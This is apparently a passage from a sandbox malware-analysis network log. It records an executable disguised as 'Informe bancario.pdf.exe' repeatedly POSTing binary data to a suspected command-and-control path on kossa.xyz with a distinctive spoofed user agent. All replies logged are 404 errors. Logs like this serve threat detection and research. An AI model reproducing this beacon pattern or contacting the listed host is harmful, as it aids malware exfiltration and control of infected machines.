                                  Jun 23, 2022 17:54:35.573404074 CEST1147OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 190
                                  Connection: close
                                  Jun 23, 2022 17:54:35.979684114 CEST1148INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:54:35 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vInpdW2j2t0TkXgNWrVbBrhz59C5ZUZepr6EXNkEDlN5Mmpr3I3XN9MXchA%2FuUuBCNvin54PKkEVjvkFMD1mUTaTWJDjljOyWMNNY2gG90YnT13wAFVp5IWO%2BbU%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe6734694506b6-LHR
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  10192.168.2.349765104.21.40.15380C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:54:54.716737032 CEST1333OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:54:55.074867964 CEST1334INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:54:55 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0akr324rj22v7XL1BzRlbcaOgwhIsL47D88GVXY%2FxOflrdVv9CvEO4yeF8f9FJu3D%2B6Y7sLCT%2BeCECm2KJKeJ%2B7ErMUaz8ZvLbAsEZPVjHkh3byzhQxA4ywMTYk%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe67ac08e59b4c-FRA
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  11192.168.2.349766104.21.40.15380C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:54:56.372364044 CEST1335OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:54:56.739352942 CEST1336INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:54:56 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2ByevUGMGsZ111zCdJS74X4XYDvx6eVZ3i%2F5VUEP17FJNs3Bqe8Qn0vElJjRGqHAY7uRrku1Pn%2FjCwHkZuCcO%2F57fHu0HPl8zmRUlYlJb33Oa25zNF9kqh6%2FNuew%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe67b658a89b8c-FRA
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  12192.168.2.349767172.67.154.7280C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:54:57.914899111 CEST1338OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:54:58.307390928 CEST1339INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:54:58 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kwfBO1rarCMHF33sDfc%2FZKo%2FIgtM77dHh4KfHrltf1yF4wOBGBcPdtPYk7Gne4ienNeRTkl01aZxPHrTI9mJKW6071l4b0ziZbDzmI6omQQuIRxDJR5b361HK7g%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe67c009327562-LHR
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  13192.168.2.349768172.67.154.7280C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:54:59.413778067 CEST1340OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:54:59.812854052 CEST1341INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:54:59 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xqhVjfx2p8PTpn4tczArStndPzakgSs%2BTWI7UJE786K6XBIJeBhOXQHsjNJk26JEngnxLLixd5ZrVVrb8Tu6D0EaWH0pbbBSZ1yLO8LXPRRQZoxw97K2w%2F9d7so%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe67c96fb24057-LHR
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  14192.168.2.349769172.67.154.7280C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:55:00.833023071 CEST1341OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:55:01.207211018 CEST1342INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:55:01 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Q5Tz5JLO2MblLMyr4APXVpxgxfK%2B0Kc3BOQhOBhwPUsguvgSrEuQlc5mh%2B9pPj8KhG7kVF7cHtszSFE%2BtD9Yahsoh%2BPGlGVRZRdCImmWU%2FfiCDnsGX2p9GMZTsY%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe67d2489376ef-LHR
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  15192.168.2.349770172.67.154.7280C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:55:02.423254013 CEST1343OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:55:02.800951004 CEST1344INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:55:02 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=31Nszk1CWYSA9SOTTjk0axXRKvLvR16xBtz06oEJk7GyK9ZiBFLDPgs20nYRt%2BvKchXumr41xrIC6OwbUn7QZAfWFpu5HQjcSbXgMxSyKeSe0hICexexAPmqGmg%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe67dc3ac9892a-LHR
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  16192.168.2.349771172.67.154.7280C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:55:04.009922981 CEST1345OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:55:04.389384031 CEST1346INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:55:04 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1jD6t2rHYuFn4FYzzNqjS8CselpLY%2Bjq1MHBr90Vx4i7IUWEUXUU3OlA90SCJ8Kl8IXVW3L9Jqh0BJ08Xwi2NYeqrBfylpgnGn0wKRBrj36qHUAfUmIVPg7XMvA%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe67e618697755-LHR
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  17192.168.2.349772172.67.154.7280C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:55:07.425069094 CEST1347OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:55:07.799252033 CEST1348INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:55:07 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Q9GKeM1DCUCNDkWTJI7si91%2FhYmrJiPTzKgnLGatICAm8LrANgt7XyJMgX0Jd8iievc76jPbBHYpgRq%2Fls3LOEKozRxm5HYpLHZPqlwA7h7XdYOvcniRwnEiPWQ%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe67fb786b8880-LHR
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  18192.168.2.349773172.67.154.7280C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:55:09.049678087 CEST1349OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:55:09.424262047 CEST1350INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:55:09 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bXMiJPIEoEUFdZzsgRFS8od9XNPKBPK1z7aPFcyn%2FA1ugjwdbtZzB%2BjRKLn%2BXSyWHJukQDQmqihBZ2YI7wjIzshUJaoxfhPtVMIDNZZcS9rYM1PWfoAX6UFsbg0%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe680598247780-LHR
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  19192.168.2.349774104.21.40.15380C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:55:10.726793051 CEST1351OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:55:11.087935925 CEST1352INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:55:11 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=FWEWYXk0vBaU2bjp48BtaQpQ3Ggqrm2QHzlEz3cjpBMCny1jbHhv9KIfMDvY7rdMAVGfKU%2FL6ctWgUmBIcCFV68Sb9CTOymCfgRyTXasPXTE76iKGKqAv5qCMAU%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe68101b8b9be8-FRA
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  2192.168.2.349743172.67.154.7280C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:54:37.108829975 CEST1149OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:54:37.484196901 CEST1150INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:54:37 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7V5Gc3atXU%2F7rltrm12KGvbycRYFCgLiJibtU08Is1x6vGrWm%2FIN9lvKLV2xmFkSfDE5rh4%2Fv1K4HHvGipuCkiTMbAUFNj04N3yK7qCmAv2YMqNtVqxcv%2Fzmb0Q%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe673df81e8895-LHR
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  20192.168.2.349775104.21.40.15380C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:55:12.061012030 CEST1352OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:55:12.409252882 CEST1353INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:55:12 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=w3W%2FUBL%2FSDBMtNUJBmJhMrWUvmbl3m9w2mVNi%2BJDP21FEOSP848VAvgSKP36DL2w0TklzdIt%2FWhOKAlXmqx%2BuscdBRUNfp46FBktKwDFwm5qu0ArkTMXp%2BiHWGo%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe6818698a9001-FRA
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  21192.168.2.349776104.21.40.15380C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:55:13.438858986 CEST1354OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:55:13.814687014 CEST1355INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:55:13 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JYmA19OcduyPB68nR4yg5R2zInSuuGr81RqiNbiBmJyM8NTQIqVdnKCsXggdgPI9IJQ639Skfc1Xaxz4PkdOsUR9ZWjgTE7x5SeIRsETBiIqx0Y7KYLktWZztss%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe682109b99a3c-FRA
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  22192.168.2.349778104.21.40.15380C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:55:15.087770939 CEST1357OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:55:15.450156927 CEST1362INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:55:15 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Az5zVGZFTjp8UJIVsr25mnNQuPqx6sYujAOPXu5NlvVO05gm%2BOdCbHP1CNU6V0PIsMANXwlKU0iprTk9ImJaLHLGsgKLWrRNBCaiu%2FM8KhdYAvY4x7eWQ0JaV%2Bw%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe682b5b2290a0-FRA
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  23192.168.2.349780104.21.40.15380C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:55:16.534873009 CEST1406OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:55:16.906121969 CEST1445INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:55:16 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9DCxtCUH7NJO56%2Bji8yNiiCJJUgJDBZTOFQ74frU1ObyxO%2F4yOA9ipX6bhRPjdAqvI9ZQ1w6oh0Rh4V58WBQaQEbC8XSU5zs1FYK9hVxC%2FFCS8PYXg4YoUngegM%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe68345ad99bfe-FRA
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  24192.168.2.349792104.21.40.15380C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:55:18.935502052 CEST1559OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:55:19.293885946 CEST1595INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:55:19 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Tvfj2PE6%2FzpvjRTad2HQGf3EmXoAygqppJ4GMoSzXIKEC9Kqx9btv3UYlJEN3dn3qCQiIHQCkSAYOzM%2B5iLgjP69WWrpi3AVPe3xJD6VNGtajlHFHll17GGpOvI%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe684359949122-FRA
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  25192.168.2.349803104.21.40.15380C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:55:20.890777111 CEST1693OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:55:21.252073050 CEST1829INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:55:21 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DKcjv7S0QT5ZJpVTvL7w3xtBMIYOOqiKId0%2BZb%2BJWAkvE4DfQZms%2FQbhb%2BqwW9ZSf5qscvDJiVACPx0SUAt0P2GDUabDptN6K7exXQzxYmUvFD3oHPdEpm7F%2Bi0%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe684f9a0a694b-FRA
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                  Data Ascii: File not found.


                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                  26192.168.2.349813104.21.40.15380C:\Users\user\Desktop\Informe bancario.pdf.exe
                                  TimestampkBytes transferredDirectionData
                                  Jun 23, 2022 17:55:22.328152895 CEST1883OUTPOST /esi/pp/play.php HTTP/1.0
                                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                                  Host: kossa.xyz
                                  Accept: */*
                                  Content-Type: application/octet-stream
                                  Content-Encoding: binary
                                  Content-Key: 690A3530
                                  Content-Length: 163
                                  Connection: close
                                  Jun 23, 2022 17:55:22.691435099 CEST1890INHTTP/1.1 404 Not Found
                                  Date: Thu, 23 Jun 2022 15:55:22 GMT
                                  Content-Type: text/html; charset=UTF-8
                                  Connection: close
                                  Status: 404 Not Found
                                  CF-Cache-Status: DYNAMIC
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3PTxemW0dpmMPKHg6J4ZsV3RIVrE%2B1D6NlYV6EaBb0CcFK4SCwX0W%2BcytmanNrEq5gg7yjHWmhtqCOwdXena8YdQgcE7Ahjm15Asa3sXW%2FHrISTw9iwetiveUDk%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 71fe68589bba9299-FRA
                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
